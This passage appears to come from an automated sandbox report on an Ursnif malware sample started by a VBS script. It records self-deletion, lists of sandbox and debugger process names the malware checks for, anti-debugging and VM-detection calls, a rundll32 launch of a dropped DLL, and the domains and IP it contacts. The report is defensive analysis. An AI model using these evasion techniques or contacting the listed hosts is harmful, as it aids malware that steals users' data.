Source: Yara match File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe File deleted: c:\users\user\desktop\start[2021.09.09_15-26].vbs
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.536145532.00000262BFE13000.00000004.00000001.sdmp Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
Found evasive API chain (may stop execution after checking system information)
Source: C:\Windows\SysWOW64\rundll32.exe Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 4084 Thread sleep time: -30000s >= -30000s
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\rundll32.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7034AC85 FindFirstFileExW, 23_2_7034AC85
Source: rundll32.exe, 00000017.00000003.697749575.00000000006A1000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW0
Source: rundll32.exe, 00000017.00000003.652715194.00000000006D5000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW

Anti Debugging:

Found API chain indicative of debugger detection
Source: C:\Windows\SysWOW64\rundll32.exe Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70340D8D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_70340D8D
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70331A0A LoadLibraryA,GetProcAddress, 23_2_70331A0A
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_703483FA GetProcessHeap, 23_2_703483FA
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7034A97E mov eax, dword ptr fs:[00000030h] 23_2_7034A97E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70342485 mov eax, dword ptr fs:[00000030h] 23_2_70342485
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7038F0B0 mov eax, dword ptr fs:[00000030h] 23_2_7038F0B0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7038EBE6 push dword ptr fs:[00000030h] 23_2_7038EBE6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_7038EFDF mov eax, dword ptr fs:[00000030h] 23_2_7038EFDF
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70340D8D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 23_2_70340D8D

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: fum.cpp.0.dr
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: pop.urlovedstuff.com
Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp Binary or memory string: Progman
Source: rundll32.exe, 00000017.00000002.735668721.0000000003390000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA, 23_2_703311BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 23_2_7034E0ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 23_2_7034E213
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 23_2_7034DA85
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 23_2_7034E319
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 23_2_7034E3E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 23_2_70344CAD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_7034DD27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_7034DD86
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_7034DE0D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 23_2_7034DE9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW, 23_2_7034DF36
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 23_2_703447E8
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C26CD6 cpuid 23_2_00C26CD6
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_703310ED GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 23_2_703310ED
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_70331F7C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 23_2_70331F7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 23_2_00C26CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 23_2_00C26CD6

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.536465811.00000262C4009000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.536316195.00000262C401E000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match File source: 00000017.00000003.607221952.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607028050.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.606994412.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607255595.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607169997.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607202425.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607241313.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.607113605.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.735811134.00000000050C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 5236, type: MEMORYSTR